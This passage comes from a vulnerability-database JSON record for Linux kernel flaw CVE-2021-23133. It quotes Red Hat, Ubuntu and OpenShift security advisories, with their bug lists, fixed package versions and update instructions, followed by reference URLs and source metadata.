CAP_CHECKPOINT_RESTORE to capability.h\n1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs\n1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails\n1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. \n1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls\n1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier\n1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()\n1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c\n1971101 - ceph: potential data corruption in cephfs write_begin codepath\n1972278 - libceph: allow addrvecs with a single NONE/blank address\n1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!\n1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]\n1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c\n1976679 - blk-mq: fix/improve io scheduler batching dispatch\n1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00\n1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50\n1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)\n1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame\n1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel\n1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level\n1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature\n1978369 - dm writecache: sync with upstream 5.14\n1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)\n1979680 - Backport openvswitch tracepoints\n1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod\n1986138 - Lockd invalid cast to nlm_lockowner\n1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()\n1989999 - ceph omnibus backport for RHEL-8.5.0\n1991976 - block: fix New warning in nvme_setup_discard\n1992700 - blk-mq: fix kernel panic when iterating over flush request\n1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files\n1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-348.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-348.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-4.18.0-348.el8.aarch64.rpm\nkernel-core-4.18.0-348.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-348.el8.aarch64.rpm\nkernel-debug-4.18.0-348.el8.aarch64.rpm\nkernel-debug-core-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-devel-4.18.0-348.el8.aarch64.rpm\nkernel-headers-4.18.0-348.el8.aarch64.rpm\nkernel-modules-4.18.0-348.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-tools-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-348.el8.aarch64.rpm\nperf-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-348.el8.noarch.rpm\nkernel-doc-4.18.0-348.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-348.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-4.18.0-348.el8.ppc64le.rpm\nkernel-core-4.18.0-348.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-348.el8.ppc64le.rpm\nperf-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-348.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-4.18.0-348.el8.s390x.rpm\nkernel-core-4.18.0-348.el8.s390x.rpm\nkernel-cross-headers-4.18.0-348.el8.s390x.rpm\nkernel-debug-4.18.0-348.el8.s390x.rpm\nkernel-debug-core-4.18.0-348.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debug-devel-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm\nkernel-devel-4.18.0-348.el8.s390x.rpm\nkernel-headers-4.18.0-348.el8.s390x.rpm\nkernel-modules-4.18.0-348.el8.s390x.rpm\nkernel-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-tools-4.18.0-348.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm\nperf-4.18.0-348.el8.s390x.rpm\nperf-debuginfo-4.18.0-348.el8.s390x.rpm\npython3-perf-4.18.0-348.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-348.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-348.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-4.18.0-348.el8.x86_64.rpm\nkernel-core-4.18.0-348.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-348.el8.x86_64.rpm\nkernel-debug-4.18.0-348.el8.x86_64.rpm\nkernel-debug-core-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-devel-4.18.0-348.el8.x86_64.rpm\nkernel-headers-4.18.0-348.el8.x86_64.rpm\nkernel-modules-4.18.0-348.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-tools-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-348.el8.x86_64.rpm\nperf-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST\nFrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l\nbobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy\nSfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW\nHgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC\nDRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E\nlJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD\nJhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK\ndQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8\nzf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v\n1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN\n+PuV5cms0sE=2UUA\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-4997-2\nJune 25, 2021\n\nlinux-kvm vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.04\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-kvm: Linux kernel for cloud environments\n\nDetails:\n\nUSN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-3609)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly enforce limits for pointer operations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-33200)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly clear received fragments from memory in some situations. A\nphysically proximate attacker could possibly use this issue to inject\npackets or expose sensitive information. (CVE-2020-24586)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled encrypted fragments. A physically proximate attacker\ncould possibly use this issue to decrypt fragments. (CVE-2020-24587)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled certain malformed frames. If a user were tricked into\nconnecting to a malicious server, a physically proximate attacker could use\nthis issue to inject packets. (CVE-2020-24588)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly verify certain fragmented frames. A physically proximate\nattacker could possibly use this issue to inject or decrypt packets. \n(CVE-2020-26141)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\naccepted plaintext fragments in certain situations. A physically proximate\nattacker could use this issue to inject packets. (CVE-2020-26145)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2021-23133)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nManfred Paul discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel contained an out-of-bounds\nvulnerability. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-31440)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). An attacker could use this\nissue to possibly execute arbitrary code. (CVE-2021-32399)\n\nIt was discovered that a use-after-free existed in the Bluetooth HCI driver\nof the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nIt was discovered that an out-of-bounds (OOB) memory access flaw existed in\nthe f2fs module of the Linux kernel. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nMathias Krause discovered that a null pointer dereference existed in the\nNitro Enclaves kernel driver of the Linux kernel. A local attacker could\nuse this issue to cause a denial of service or possibly execute arbitrary\ncode. (CVE-2021-3543)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.04:\n linux-image-5.11.0-1009-kvm 5.11.0-1009.9\n linux-image-kvm 5.11.0.1009.9\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://ubuntu.com/security/notices/USN-4997-2\n https://ubuntu.com/security/notices/USN-4997-1\n CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139,\n CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133,\n CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399,\n CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543,\n CVE-2021-3609\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9\n\n. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-23133"
},
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "PACKETSTORM",
"id": "164875"
},
{
"db": "PACKETSTORM",
"id": "164837"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "164967"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-23133",
"trust": 2.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/10/1",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/10/2",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/04/18/2",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/10/3",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/10/4",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164875",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163249",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163291",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.2589",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2249",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2511",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3905",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2528",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2423",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2409",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2216",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2079",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3825",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4254",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021051015",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-23133",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164837",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163251",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163253",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163255",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163262",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163301",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164967",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "PACKETSTORM",
"id": "164875"
},
{
"db": "PACKETSTORM",
"id": "164837"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
},
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"id": "VAR-202104-1571",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.625
},
"last_update_date": "2026-04-10T23:03:20.449000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Linux kernel Repair measures for the competition condition problem loophole",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=148726"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-23133 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-362",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b166a20b07382b8bc1dcee2a448715c9c2c81b5b"
},
{
"trust": 1.7,
"url": "https://www.openwall.com/lists/oss-security/2021/04/18/2"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/10/1"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/10/2"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/10/3"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/10/4"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20210611-0008/"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/paeq3h6hkno6kucgrzvysfsageux23jl/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/cux2ca63453g34c6kyvbljxjxearzi2x/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/xzashzvcofj4vu2i3bn5w5ephwjq7qwx/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/paeq3h6hkno6kucgrzvysfsageux23jl/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/cux2ca63453g34c6kyvbljxjxearzi2x/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/xzashzvcofj4vu2i3bn5w5ephwjq7qwx/"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021051015"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163291/ubuntu-security-notice-usn-5000-2.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164875/red-hat-security-advisory-2021-4140-02.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2216"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2249"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2589"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2409"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2528"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3825"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163249/ubuntu-security-notice-usn-4997-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2423"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2511"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2079"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-memory-corruption-via-sctp-destroy-sock-35106"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26143"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24504"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3600"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-20239"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26144"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3679"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36158"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3635"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31829"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26145"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36386"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33200"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-29650"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
},
{
